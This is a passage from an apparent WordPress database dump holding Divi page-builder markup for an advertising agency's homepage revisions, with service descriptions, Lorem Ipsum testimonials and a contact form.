text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 20:13:46','2020-08-04 20:13:46','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(422,1,'2020-08-05 07:27:52','2020-08-05 07:27:52','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: 